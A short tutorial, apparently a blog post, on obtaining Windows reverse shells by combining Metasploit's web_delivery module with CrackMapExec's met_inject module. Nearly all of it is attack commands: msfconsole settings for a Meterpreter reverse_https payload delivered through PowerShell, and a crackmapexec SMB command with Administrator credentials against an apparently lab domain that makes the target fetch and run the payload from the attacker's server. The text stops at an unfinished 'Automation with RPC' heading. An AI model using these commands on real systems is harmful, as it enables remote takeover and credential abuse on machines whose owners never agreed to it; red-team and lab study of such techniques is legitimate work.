CME Reverse Shell with Metasploit

CME Reverse Shell with Metasploit

Getting Reverse Shells with Metasploit and CrackMapExec


1 min read

Play this article

Today I will explain how to integrate CrackMapExec 5.4.0 with Metasploit and get a reverse shell in the lame way.

First, we need to start the msfconsole and select the exploit web_delivery since we using a web server to deliver our code we need an HTTPS reverse shell as payload.

MSF Exploit

use exploit/multi/script/web_delivery
set SRVPORT 8443
set exitonsession false
set SSL true

Select Payload

set payload windows/meterpreter/reverse_https
set LPORT 443
set LURI rfs

Select the Type of Target

Here we have multiple options, we select target 2 which is used for Powershell

set target 2
exploit -j

CrackMapExec with Metasploit

crackmapexec smb -u 'Administrator' -p 'Password!' 
-d dc.deathstar.rfs 
-M met_inject -o SRVHOST= SRVPORT=9443 RAND=J3PR0Jn6smfPvr SSL=https

Automation with RPC

vi ~/.cme/cme.conf